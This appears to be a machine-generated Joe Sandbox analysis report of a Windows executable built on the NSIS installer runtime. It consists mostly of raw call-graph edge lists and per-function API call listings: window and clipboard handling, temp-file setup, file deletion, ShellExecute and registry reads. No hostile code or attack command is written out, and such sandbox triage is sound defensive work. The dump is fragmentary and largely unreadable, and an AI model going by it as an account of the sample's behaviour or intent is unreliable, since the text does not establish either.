3771->3769 3772->3572 3774 40634f PeekMessageW 3773->3774 3775 406345 DispatchMessageW 3774->3775 3776 403301 3774->3776 3775->3774 3776->3565 3778 407332 3777->3778 3779 40733a 3777->3779 3778->3769 3779->3778 3780 4073c2 GlobalFree 3779->3780 3781 4073cb GlobalAlloc 3779->3781 3782 407443 GlobalAlloc 3779->3782 3783 40743a GlobalFree 3779->3783 3780->3781 3781->3778 3781->3779 3782->3778 3782->3779 3783->3782 3785 404f8b 3784->3785 3794 40502f 3784->3794 3786 404fa9 lstrlenW 3785->3786 3787 406805 18 API calls 3785->3787 3788 404fd2 3786->3788 3789 404fb7 lstrlenW 3786->3789 3787->3786 3791 404fe5 3788->3791 3792 404fd8 SetWindowTextW 3788->3792 3790 404fc9 lstrcatW 3789->3790 3789->3794 3790->3788 3793 404feb SendMessageW SendMessageW SendMessageW 3791->3793 3791->3794 3792->3791 3793->3794 3794->3769 3795->3751 3797 403ea9 3796->3797 3825 405f51 wsprintfW 3797->3825 3799 403f1d 3800 406805 18 API calls 3799->3800 3801 403f29 SetWindowTextW 3800->3801 3803 403f44 3801->3803 3802 403f5f 3802->3595 3803->3802 3804 406805 18 API calls 3803->3804 3804->3803 3826 403daf 3805->3826 3807 40506a 3810 4062a3 11 API calls 3807->3810 3812 405095 3807->3812 3829 40139d 3807->3829 3808 403daf SendMessageW 3809 4050a5 OleUninitialize 3808->3809 3809->3632 3810->3807 3812->3808 3813->3592 3815 405f07 RegQueryValueExW 3814->3815 3816 405989 3814->3816 3817 405f29 RegCloseKey 3815->3817 3816->3590 3816->3591 3817->3816 3819->3597 3964 406009 lstrcpynW 3820->3964 3822 403e88 3823 406722 3 API calls 3822->3823 3824 403e8e lstrcatW 3823->3824 3824->3615 3825->3799 3827 403dc7 3826->3827 3828 403db8 SendMessageW 3826->3828 3827->3807 3828->3827 3832 4013a4 3829->3832 3830 401410 3830->3807 3832->3830 3833 4013dd MulDiv SendMessageW 3832->3833 3834 4015a0 3832->3834 3833->3832 3835 4015fa 3834->3835 3914 40160c 3834->3914 3836 401601 3835->3836 3837 401742 3835->3837 3838 401962 3835->3838 3839 4019ca 3835->3839 3840 40176e 3835->3840 3841 401650 3835->3841 3842 4017b1 3835->3842 
3843 401672 3835->3843 3844 401693 3835->3844 3845 401616 3835->3845 3846 4016d6 3835->3846 3847 401736 3835->3847 3848 401897 3835->3848 3849 4018db 3835->3849 3850 40163c 3835->3850 3851 4016bd 3835->3851 3835->3914 3864 4062a3 11 API calls 3836->3864 3856 401751 ShowWindow 3837->3856 3857 401758 3837->3857 3861 40145c 18 API calls 3838->3861 3854 40145c 18 API calls 3839->3854 3858 40145c 18 API calls 3840->3858 3881 4062a3 11 API calls 3841->3881 3947 40145c 3842->3947 3859 40145c 18 API calls 3843->3859 3941 401446 3844->3941 3853 40145c 18 API calls 3845->3853 3870 401446 18 API calls 3846->3870 3846->3914 3847->3914 3963 405f51 wsprintfW 3847->3963 3860 40145c 18 API calls 3848->3860 3865 40145c 18 API calls 3849->3865 3855 401647 PostQuitMessage 3850->3855 3850->3914 3852 4062a3 11 API calls 3851->3852 3867 4016c7 SetForegroundWindow 3852->3867 3868 40161c 3853->3868 3869 4019d1 SearchPathW 3854->3869 3855->3914 3856->3857 3871 401765 ShowWindow 3857->3871 3857->3914 3872 401775 3858->3872 3873 401678 3859->3873 3874 40189d 3860->3874 3875 401968 GetFullPathNameW 3861->3875 3864->3914 3866 4018e2 3865->3866 3878 40145c 18 API calls 3866->3878 3867->3914 3879 4062a3 11 API calls 3868->3879 3869->3914 3870->3914 3871->3914 3882 4062a3 11 API calls 3872->3882 3883 4062a3 11 API calls 3873->3883 3959 4062d5 FindFirstFileW 3874->3959 3885 40197f 3875->3885 3927 4019a1 3875->3927 3877 40169a 3944 4062a3 lstrlenW wvsprintfW 3877->3944 3888 4018eb 3878->3888 3889 401627 3879->3889 3890 401664 3881->3890 3891 401785 SetFileAttributesW 3882->3891 3892 401683 3883->3892 3909 4062d5 2 API calls 3885->3909 3885->3927 3886 4062a3 11 API calls 3894 4017c9 3886->3894 3897 40145c 18 API calls 3888->3897 3898 404f72 25 API calls 3889->3898 3899 40139d 65 API calls 3890->3899 3900 40179a 3891->3900 3891->3914 3907 404f72 25 API calls 3892->3907 3952 405d59 CharNextW CharNextW 3894->3952 3896 4019b8 GetShortPathNameW 3896->3914 3905 4018f5 3897->3905 3898->3914 3899->3914 3906 
4062a3 11 API calls 3900->3906 3901 4018c2 3910 4062a3 11 API calls 3901->3910 3902 4018a9 3908 4062a3 11 API calls 3902->3908 3912 4062a3 11 API calls 3905->3912 3906->3914 3907->3914 3908->3914 3913 401991 3909->3913 3910->3914 3911 4017d4 3915 401864 3911->3915 3918 405d06 CharNextW 3911->3918 3936 4062a3 11 API calls 3911->3936 3916 401902 MoveFileW 3912->3916 3913->3927 3962 406009 lstrcpynW 3913->3962 3914->3832 3915->3892 3917 40186e 3915->3917 3919 401912 3916->3919 3920 40191e 3916->3920 3921 404f72 25 API calls 3917->3921 3923 4017e6 CreateDirectoryW 3918->3923 3919->3892 3925 401942 3920->3925 3930 4062d5 2 API calls 3920->3930 3926 401875 3921->3926 3923->3911 3924 4017fe GetLastError 3923->3924 3928 401827 GetFileAttributesW 3924->3928 3929 40180b GetLastError 3924->3929 3935 4062a3 11 API calls 3925->3935 3958 406009 lstrcpynW 3926->3958 3927->3896 3927->3914 3928->3911 3932 4062a3 11 API calls 3929->3932 3933 401929 3930->3933 3932->3911 3933->3925 3938 406c68 42 API calls 3933->3938 3934 401882 SetCurrentDirectoryW 3934->3914 3937 40195c 3935->3937 3936->3911 3937->3914 3939 401936 3938->3939 3940 404f72 25 API calls 3939->3940 3940->3925 3942 406805 18 API calls 3941->3942 3943 401455 3942->3943 3943->3877 3945 4060e7 9 API calls 3944->3945 3946 4016a7 Sleep 3945->3946 3946->3914 3948 406805 18 API calls 3947->3948 3949 401488 3948->3949 3950 401497 3949->3950 3951 406038 5 API calls 3949->3951 3950->3886 3951->3950 3953 405d76 3952->3953 3954 405d88 3952->3954 3953->3954 3955 405d83 CharNextW 3953->3955 3956 405dac 3954->3956 3957 405d06 CharNextW 3954->3957 3955->3956 3956->3911 3957->3954 3958->3934 3960 4018a5 3959->3960 3961 4062eb FindClose 3959->3961 3960->3901 3960->3902 3961->3960 3962->3927 3963->3914 3964->3822 3966 403c91 3965->3966 3967 403876 3966->3967 3968 403c96 FreeLibrary GlobalFree 3966->3968 3969 406c9b 3967->3969 3968->3967 3968->3968 3970 40677e 18 API calls 3969->3970 3971 406cae 3970->3971 3972 406cb7 DeleteFileW 3971->3972 
3973 406cce 3971->3973 4013 403882 CoUninitialize 3972->4013 3974 406e4b 3973->3974 4017 406009 lstrcpynW 3973->4017 3980 4062d5 2 API calls 3974->3980 4002 406e58 3974->4002 3974->4013 3976 406cf9 3977 406d03 lstrcatW 3976->3977 3978 406d0d 3976->3978 3979 406d13 3977->3979 3981 406751 2 API calls 3978->3981 3983 406d23 lstrcatW 3979->3983 3984 406d19 3979->3984 3982 406e64 3980->3982 3981->3979 3987 406722 3 API calls 3982->3987 3982->4013 3986 406d2b lstrlenW FindFirstFileW 3983->3986 3984->3983 3984->3986 3985 4062a3 11 API calls 3985->4013 3988 406e3b 3986->3988 3992 406d52 3986->3992 3989 406e6e 3987->3989 3988->3974 3991 4062a3 11 API calls 3989->3991 3990 405d06 CharNextW 3990->3992 3993 406e79 3991->3993 3992->3990 3996 406e18 FindNextFileW 3992->3996 4005 406c9b 72 API calls 3992->4005 4012 404f72 25 API calls 3992->4012 4014 4062a3 11 API calls 3992->4014 4015 404f72 25 API calls 3992->4015 4016 406c68 42 API calls 3992->4016 4018 406009 lstrcpynW 3992->4018 4019 405e30 GetFileAttributesW 3992->4019 3994 405e30 2 API calls 3993->3994 3995 406e81 RemoveDirectoryW 3994->3995 3999 406ec4 3995->3999 4000 406e8d 3995->4000 3996->3992 3998 406e30 FindClose 3996->3998 3998->3988 4001 404f72 25 API calls 3999->4001 4000->4002 4003 406e93 4000->4003 4001->4013 4002->3985 4004 4062a3 11 API calls 4003->4004 4006 406e9d 4004->4006 4005->3992 4008 404f72 25 API calls 4006->4008 4010 406ea7 4008->4010 4011 406c68 42 API calls 4010->4011 4011->4013 4012->3996 4013->3491 4013->3492 4014->3992 4015->3992 4016->3992 4017->3976 4018->3992 4020 405e4d DeleteFileW 4019->4020 4021 405e3f SetFileAttributesW 4019->4021 4020->3992 4021->4020 4022->3653 4023->3677 4024->3696 4025->3696 4026->3685 4028 406ae7 GetShortPathNameW 4027->4028 4029 406abe 4027->4029 4030 406b00 4028->4030 4031 406c62 4028->4031 4053 405e50 GetFileAttributesW CreateFileW 4029->4053 4030->4031 4033 406b08 WideCharToMultiByte 4030->4033 4031->3706 4033->4031 4035 406b25 WideCharToMultiByte 4033->4035 4034 
406ac7 CloseHandle GetShortPathNameW 4034->4031 4036 406adf 4034->4036 4035->4031 4037 406b3d wsprintfA 4035->4037 4036->4028 4036->4031 4038 406805 18 API calls 4037->4038 4039 406b69 4038->4039 4054 405e50 GetFileAttributesW CreateFileW 4039->4054 4041 406b76 4041->4031 4042 406b83 GetFileSize GlobalAlloc 4041->4042 4043 406ba4 ReadFile 4042->4043 4044 406c58 CloseHandle 4042->4044 4043->4044 4045 406bbe 4043->4045 4044->4031 4045->4044 4055 405db6 lstrlenA 4045->4055 4048 406bd7 lstrcpyA 4051 406bf9 4048->4051 4049 406beb 4050 405db6 4 API calls 4049->4050 4050->4051 4052 406c30 SetFilePointer WriteFile GlobalFree 4051->4052 4052->4044 4053->4034 4054->4041 4056 405df7 lstrlenA 4055->4056 4057 405dd0 lstrcmpiA 4056->4057 4058 405dff 4056->4058 4057->4058 4059 405dee CharNextA 4057->4059 4058->4048 4058->4049 4059->4056 4940 402a84 4941 401553 19 API calls 4940->4941 4942 402a8e 4941->4942 4943 401446 18 API calls 4942->4943 4944 402a98 4943->4944 4945 401a13 4944->4945 4946 402ab2 RegEnumKeyW 4944->4946 4947 402abe RegEnumValueW 4944->4947 4948 402a7e 4946->4948 4947->4945 4947->4948 4948->4945 4949 4029e4 RegCloseKey 4948->4949 4949->4945 4950 402c8a 4951 402ca2 4950->4951 4952 402c8f 4950->4952 4954 40145c 18 API calls 4951->4954 4953 401446 18 API calls 4952->4953 4956 402c97 4953->4956 4955 402ca9 lstrlenW 4954->4955 4955->4956 4957 402ccb WriteFile 4956->4957 4958 401a13 4956->4958 4957->4958 4959 40400d 4960 40406a 4959->4960 4961 40401a lstrcpynA lstrlenA 4959->4961 4961->4960 4962 40404b 4961->4962 4962->4960 4963 404057 GlobalFree 4962->4963 4963->4960 4964 401d8e 4965 40145c 18 API calls 4964->4965 4966 401d95 ExpandEnvironmentStringsW 4965->4966 4967 401da8 4966->4967 4969 401db9 4966->4969 4968 401dad lstrcmpW 4967->4968 4967->4969 4968->4969 4970 401e0f 4971 401446 18 API calls 4970->4971 4972 401e17 4971->4972 4973 401446 18 API calls 4972->4973 4974 401e21 4973->4974 4975 4030e3 4974->4975 4977 405f51 wsprintfW 4974->4977 4977->4975 4978 402392 
4979 40145c 18 API calls 4978->4979 4980 402399 4979->4980 4983 4071f8 4980->4983 4984 406ed2 25 API calls 4983->4984 4985 407218 4984->4985 4986 407222 lstrcpynW lstrcmpW 4985->4986 4987 4023a7 4985->4987 4988 407254 4986->4988 4989 40725a lstrcpynW 4986->4989 4988->4989 4989->4987 4060 402713 4075 406009 lstrcpynW 4060->4075 4062 40272c 4076 406009 lstrcpynW 4062->4076 4064 402738 4065 40145c 18 API calls 4064->4065 4067 402743 4064->4067 4065->4067 4066 402752 4069 40145c 18 API calls 4066->4069 4071 402761 4066->4071 4067->4066 4068 40145c 18 API calls 4067->4068 4068->4066 4069->4071 4070 40145c 18 API calls 4072 40276b 4070->4072 4071->4070 4073 4062a3 11 API calls 4072->4073 4074 40277f WritePrivateProfileStringW 4073->4074 4075->4062 4076->4064 4990 402797 4991 40145c 18 API calls 4990->4991 4992 4027ae 4991->4992 4993 40145c 18 API calls 4992->4993 4994 4027b7 4993->4994 4995 40145c 18 API calls 4994->4995 4996 4027c0 GetPrivateProfileStringW lstrcmpW 4995->4996 4997 402e18 4998 40145c 18 API calls 4997->4998 4999 402e1f FindFirstFileW 4998->4999 5000 402e32 4999->5000 5005 405f51 wsprintfW 5000->5005 5002 402e43 5006 406009 lstrcpynW 5002->5006 5004 402e50 5005->5002 5006->5004 5007 401e9a 5008 40145c 18 API calls 5007->5008 5009 401ea1 5008->5009 5010 401446 18 API calls 5009->5010 5011 401eab wsprintfW 5010->5011 4287 401a1f 4288 40145c 18 API calls 4287->4288 4289 401a26 4288->4289 4290 4062a3 11 API calls 4289->4290 4291 401a49 4290->4291 4292 401a64 4291->4292 4293 401a5c 4291->4293 4341 406009 lstrcpynW 4292->4341 4340 406009 lstrcpynW 4293->4340 4296 401a62 4300 406038 5 API calls 4296->4300 4297 401a6f 4298 406722 3 API calls 4297->4298 4299 401a75 lstrcatW 4298->4299 4299->4296 4302 401a81 4300->4302 4301 4062d5 2 API calls 4301->4302 4302->4301 4303 405e30 2 API calls 4302->4303 4305 401a98 CompareFileTime 4302->4305 4306 401ba9 4302->4306 4310 4062a3 11 API calls 4302->4310 4314 406009 lstrcpynW 4302->4314 4320 406805 18 API calls 4302->4320 
4327 405ca0 MessageBoxIndirectW 4302->4327 4331 401b50 4302->4331 4338 401b5d 4302->4338 4339 405e50 GetFileAttributesW CreateFileW 4302->4339 4303->4302 4305->4302 4307 404f72 25 API calls 4306->4307 4309 401bb3 4307->4309 4308 404f72 25 API calls 4311 401b70 4308->4311 4312 40337f 37 API calls 4309->4312 4310->4302 4315 4062a3 11 API calls 4311->4315 4313 401bc6 4312->4313 4316 4062a3 11 API calls 4313->4316 4314->4302 4322 401b8b 4315->4322 4317 401bda 4316->4317 4318 401be9 SetFileTime 4317->4318 4319 401bf8 CloseHandle 4317->4319 4318->4319 4321 401c09 4319->4321 4319->4322 4320->4302 4323 401c21 4321->4323 4324 401c0e 4321->4324 4326 406805 18 API calls 4323->4326 4325 406805 18 API calls 4324->4325 4328 401c16 lstrcatW 4325->4328 4329 401c29 4326->4329 4327->4302 4328->4329 4330 4062a3 11 API calls 4329->4330 4332 401c34 4330->4332 4333 401b93 4331->4333 4334 401b53 4331->4334 4335 405ca0 MessageBoxIndirectW 4332->4335 4336 4062a3 11 API calls 4333->4336 4337 4062a3 11 API calls 4334->4337 4335->4322 4336->4322 4337->4338 4338->4308 4339->4302 4340->4296 4341->4297 5012 40209f GetDlgItem GetClientRect 5013 40145c 18 API calls 5012->5013 5014 4020cf LoadImageW SendMessageW 5013->5014 5015 4030e3 5014->5015 5016 4020ed DeleteObject 5014->5016 5016->5015 5017 402b9f 5018 401446 18 API calls 5017->5018 5023 402ba7 5018->5023 5019 402c4a 5020 402bdf ReadFile 5022 402c3d 5020->5022 5020->5023 5021 401446 18 API calls 5021->5022 5022->5019 5022->5021 5029 402d17 ReadFile 5022->5029 5023->5019 5023->5020 5023->5022 5024 402c06 MultiByteToWideChar 5023->5024 5025 402c3f 5023->5025 5027 402c4f 5023->5027 5024->5023 5024->5027 5030 405f51 wsprintfW 5025->5030 5027->5022 5028 402c6b SetFilePointer 5027->5028 5028->5022 5029->5022 5030->5019 5031 402b23 GlobalAlloc 5032 402b39 5031->5032 5033 402b4b 5031->5033 5034 401446 18 API calls 5032->5034 5035 40145c 18 API calls 5033->5035 5036 402b41 5034->5036 5037 402b52 WideCharToMultiByte lstrlenA 5035->5037 5038 402b93 
5036->5038 5039 402b84 WriteFile 5036->5039 5037->5036 5039->5038 5040 402384 GlobalFree 5039->5040 5040->5038 5042 4044a5 5043 404512 5042->5043 5044 4044df 5042->5044 5046 40451f GetDlgItem GetAsyncKeyState 5043->5046 5053 4045b1 5043->5053 5110 405c84 GetDlgItemTextW 5044->5110 5049 40453e GetDlgItem 5046->5049 5056 40455c 5046->5056 5047 4044ea 5050 406038 5 API calls 5047->5050 5048 40469d 5108 404833 5048->5108 5112 405c84 GetDlgItemTextW 5048->5112 5051 403d3f 19 API calls 5049->5051 5052 4044f0 5050->5052 5055 404551 ShowWindow 5051->5055 5058 403e74 5 API calls 5052->5058 5053->5048 5059 406805 18 API calls 5053->5059 5053->5108 5055->5056 5061 404579 SetWindowTextW 5056->5061 5066 405d59 4 API calls 5056->5066 5057 403dca 8 API calls 5062 404847 5057->5062 5063 4044f5 GetDlgItem 5058->5063 5064 40462f SHBrowseForFolderW 5059->5064 5060 4046c9 5065 40677e 18 API calls 5060->5065 5067 403d3f 19 API calls 5061->5067 5068 404503 IsDlgButtonChecked 5063->5068 5063->5108 5064->5048 5069 404647 CoTaskMemFree 5064->5069 5070 4046cf 5065->5070 5071 40456f 5066->5071 5072 404597 5067->5072 5068->5043 5073 406722 3 API calls 5069->5073 5113 406009 lstrcpynW 5070->5113 5071->5061 5077 406722 3 API calls 5071->5077 5074 403d3f 19 API calls 5072->5074 5075 404654 5073->5075 5078 4045a2 5074->5078 5079 40468b SetDlgItemTextW 5075->5079 5084 406805 18 API calls 5075->5084 5077->5061 5111 403d98 SendMessageW 5078->5111 5079->5048 5080 4046e6 5082 4062fc 3 API calls 5080->5082 5091 4046ee 5082->5091 5083 4045aa 5087 4062fc 3 API calls 5083->5087 5085 404673 lstrcmpiW 5084->5085 5085->5079 5088 404684 lstrcatW 5085->5088 5086 404730 5114 406009 lstrcpynW 5086->5114 5087->5053 5088->5079 5090 404739 5092 405d59 4 API calls 5090->5092 5091->5086 5096 406751 2 API calls 5091->5096 5097 404785 5091->5097 5093 40473f GetDiskFreeSpaceW 5092->5093 5095 404763 MulDiv 5093->5095 5093->5097 5095->5097 5096->5091 5099 4047e2 5097->5099 5100 4043ad 21 API calls 5097->5100 5098 404805 
5115 403d85 KiUserCallbackDispatcher 5098->5115 5099->5098 5101 40141d 80 API calls 5099->5101 5102 4047d3 5100->5102 5101->5098 5104 4047e4 SetDlgItemTextW 5102->5104 5105 4047d8 5102->5105 5104->5099 5106 4043ad 21 API calls 5105->5106 5106->5099 5107 404821 5107->5108 5116 403d61 5107->5116 5108->5057 5110->5047 5111->5083 5112->5060 5113->5080 5114->5090 5115->5107 5117 403d74 SendMessageW 5116->5117 5118 403d6f 5116->5118 5117->5108 5118->5117 5119 402da5 5120 4030e3 5119->5120 5121 402dac 5119->5121 5122 401446 18 API calls 5121->5122 5123 402db8 5122->5123 5124 402dbf SetFilePointer 5123->5124 5124->5120 5125 402dcf 5124->5125 5125->5120 5127 405f51 wsprintfW 5125->5127 5127->5120 5128 4030a9 SendMessageW 5129 4030c2 InvalidateRect 5128->5129 5130 4030e3 5128->5130 5129->5130 5131 401cb2 5132 40145c 18 API calls 5131->5132 5133 401c54 5132->5133 5134 4062a3 11 API calls 5133->5134 5137 401c64 5133->5137 5135 401c59 5134->5135 5136 406c9b 81 API calls 5135->5136 5136->5137 4087 4021b5 4088 40145c 18 API calls 4087->4088 4089 4021bb 4088->4089 4090 40145c 18 API calls 4089->4090 4091 4021c4 4090->4091 4092 40145c 18 API calls 4091->4092 4093 4021cd 4092->4093 4094 40145c 18 API calls 4093->4094 4095 4021d6 4094->4095 4096 404f72 25 API calls 4095->4096 4097 4021e2 ShellExecuteW 4096->4097 4098 40221b 4097->4098 4099 40220d 4097->4099 4101 4062a3 11 API calls 4098->4101 4100 4062a3 11 API calls 4099->4100 4100->4098 4102 402230 4101->4102 5145 402238 5146 40145c 18 API calls 5145->5146 5147 40223e 5146->5147 5148 4062a3 11 API calls 5147->5148 5149 40224b 5148->5149 5150 404f72 25 API calls 5149->5150 5151 402255 5150->5151 5152 405c3f 2 API calls 5151->5152 5153 40225b 5152->5153 5154 4062a3 11 API calls 5153->5154 5157 4022ac CloseHandle 5153->5157 5160 40226d 5154->5160 5156 4030e3 5157->5156 5158 402283 WaitForSingleObject 5159 402291 GetExitCodeProcess 5158->5159 5158->5160 5159->5157 5162 4022a3 5159->5162 5160->5157 5160->5158 5161 406332 2 API calls 
5160->5161 5161->5158 5164 405f51 wsprintfW 5162->5164 5164->5157 5165 4040b8 5166 4040d3 5165->5166 5174 404201 5165->5174 5170 40410e 5166->5170 5196 403fca WideCharToMultiByte 5166->5196 5167 40426c 5168 404276 GetDlgItem 5167->5168 5169 40433e 5167->5169 5171 404290 5168->5171 5172 4042ff 5168->5172 5175 403dca 8 API calls 5169->5175 5177 403d3f 19 API calls 5170->5177 5171->5172 5180 4042b6 6 API calls 5171->5180 5172->5169 5181 404311 5172->5181 5174->5167 5174->5169 5176 40423b GetDlgItem SendMessageW 5174->5176 5179 404339 5175->5179 5201 403d85 KiUserCallbackDispatcher 5176->5201 5178 40414e 5177->5178 5183 403d3f 19 API calls 5178->5183 5180->5172 5184 404327 5181->5184 5185 404317 SendMessageW 5181->5185 5188 40415b CheckDlgButton 5183->5188 5184->5179 5189 40432d SendMessageW 5184->5189 5185->5184 5186 404267 5187 403d61 SendMessageW 5186->5187 5187->5167 5199 403d85 KiUserCallbackDispatcher 5188->5199 5189->5179 5191 404179 GetDlgItem 5200 403d98 SendMessageW 5191->5200 5193 40418f SendMessageW 5194 4041b5 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5193->5194 5195 4041ac GetSysColor 5193->5195 5194->5179 5195->5194 5197 404007 5196->5197 5198 403fe9 GlobalAlloc WideCharToMultiByte 5196->5198 5197->5170 5198->5197 5199->5191 5200->5193 5201->5186 4196 401eb9 4197 401f24 4196->4197 4198 401ec6 4196->4198 4199 401f53 GlobalAlloc 4197->4199 4200 401f28 4197->4200 4201 401ed5 4198->4201 4208 401ef7 4198->4208 4202 406805 18 API calls 4199->4202 4207 4062a3 11 API calls 4200->4207 4212 401f36 4200->4212 4203 4062a3 11 API calls 4201->4203 4206 401f46 4202->4206 4204 401ee2 4203->4204 4209 402708 4204->4209 4214 406805 18 API calls 4204->4214 4206->4209 4210 402387 GlobalFree 4206->4210 4207->4212 4218 406009 lstrcpynW 4208->4218 4210->4209 4220 406009 lstrcpynW 4212->4220 4213 401f06 4219 406009 lstrcpynW 4213->4219 4214->4204 4216 401f15 4221 406009 lstrcpynW 4216->4221 4218->4213 4219->4216 4220->4206 4221->4209 5202 4074bb 5204 407344 
5202->5204 5203 407c6d 5204->5203 5205 4073c2 GlobalFree 5204->5205 5206 4073cb GlobalAlloc 5204->5206 5207 407443 GlobalAlloc 5204->5207 5208 40743a GlobalFree 5204->5208 5205->5206 5206->5203 5206->5204 5207->5203 5207->5204 5208->5207

Control-flow Graph

[Interactive figure: control-flow graph of the function at 0x4050CD (entry block 0x4050CD-0x4050E8), with executed and not-executed basic blocks marked. The edge list that rendered it is omitted here; the API calls made from its blocks are listed under APIs below.]
                                                                                                          APIs
                                                                                                          • GetDlgItem.USER32(?,00000403), ref: 0040512F
                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 0040513E
                                                                                                          • GetClientRect.USER32(?,?), ref: 00405196
                                                                                                          • GetSystemMetrics.USER32(00000015), ref: 0040519E
                                                                                                          • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051BF
                                                                                                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051D0
                                                                                                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004051E3
                                                                                                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004051F1
                                                                                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405204
                                                                                                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405226
                                                                                                          • ShowWindow.USER32(?,00000008), ref: 0040523A
                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 0040525B
                                                                                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040526B
                                                                                                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405280
                                                                                                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040528C
                                                                                                          • GetDlgItem.USER32(?,000003F8), ref: 0040514D
                                                                                                            • Part of subcall function 00403D98: SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                                                                            • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004052AB
                                                                                                          • CreateThread.KERNELBASE(00000000,00000000,Function_00005047,00000000), ref: 004052B9
                                                                                                          • CloseHandle.KERNELBASE(00000000), ref: 004052C0
                                                                                                          • ShowWindow.USER32(00000000), ref: 004052E7
                                                                                                          • ShowWindow.USER32(?,00000008), ref: 004052EC
                                                                                                          • ShowWindow.USER32(00000008), ref: 00405333
                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405365
                                                                                                          • CreatePopupMenu.USER32 ref: 00405376
                                                                                                          • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040538B
                                                                                                          • GetWindowRect.USER32(?,?), ref: 0040539E
                                                                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053C0
                                                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 004053FB
                                                                                                          • OpenClipboard.USER32(00000000), ref: 0040540B
                                                                                                          • EmptyClipboard.USER32 ref: 00405411
                                                                                                          • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D
                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00405427
                                                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040543B
                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 0040545D
                                                                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 00405468
                                                                                                          • CloseClipboard.USER32 ref: 0040546E
Memory Dump Source
• Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                                                          • String ID: @rD$New install of "%s" to "%s"${
                                                                                                          • API String ID: 2110491804-2409696222
                                                                                                          • Opcode ID: f168db28b2c12902a58862b60cbdcc3c6e49ead995c60d9878de2ccec3fe74d8
                                                                                                          • Instruction ID: 480b9f2609884c7685ddca5963e0cfcc77f9e358d06567921943d8ab7e89b76b
                                                                                                          • Opcode Fuzzy Hash: f168db28b2c12902a58862b60cbdcc3c6e49ead995c60d9878de2ccec3fe74d8
                                                                                                          • Instruction Fuzzy Hash: 14B15B70800608FFDB11AFA0DD85EAE7B79EF44355F00803AFA45BA1A0CBB49A519F59

Control-flow Graph

[Interactive figure: control-flow graph of the function at 0x403883 (entry block 0x403883-0x403919), with executed and not-executed basic blocks marked. The edge list that rendered it is omitted here; the API calls made from its blocks are listed under APIs below.]
                                                                                                          APIs
                                                                                                          • #17.COMCTL32 ref: 004038A2
                                                                                                          • SetErrorMode.KERNELBASE(00008001), ref: 004038AD
                                                                                                          • OleInitialize.OLE32(00000000), ref: 004038B4
                                                                                                            • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                                                            • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                                                            • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                                                          • SHGetFileInfoW.SHELL32(00409264,00000000,?,000002B4,00000000), ref: 004038DC
                                                                                                            • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                          • GetCommandLineW.KERNEL32(0046ADC0,NSIS Error), ref: 004038F1
                                                                                                          • GetModuleHandleW.KERNEL32(00000000,004C30A0,00000000), ref: 00403904
                                                                                                          • CharNextW.USER32(00000000,004C30A0,00000020), ref: 0040392B
                                                                                                          • GetTempPathW.KERNEL32(00002004,004D70C8,00000000,00000020), ref: 00403A00
                                                                                                          • GetWindowsDirectoryW.KERNEL32(004D70C8,00001FFF), ref: 00403A15
                                                                                                          • lstrcatW.KERNEL32(004D70C8,\Temp), ref: 00403A21
                                                                                                          • DeleteFileW.KERNELBASE(004D30C0), ref: 00403A38
                                                                                                          • CoUninitialize.COMBASE(?), ref: 00403AD1
                                                                                                          • ExitProcess.KERNEL32 ref: 00403AF1
                                                                                                          • lstrcatW.KERNEL32(004D70C8,~nsu.tmp), ref: 00403AFD
                                                                                                          • lstrcmpiW.KERNEL32(004D70C8,004CF0B8,004D70C8,~nsu.tmp), ref: 00403B09
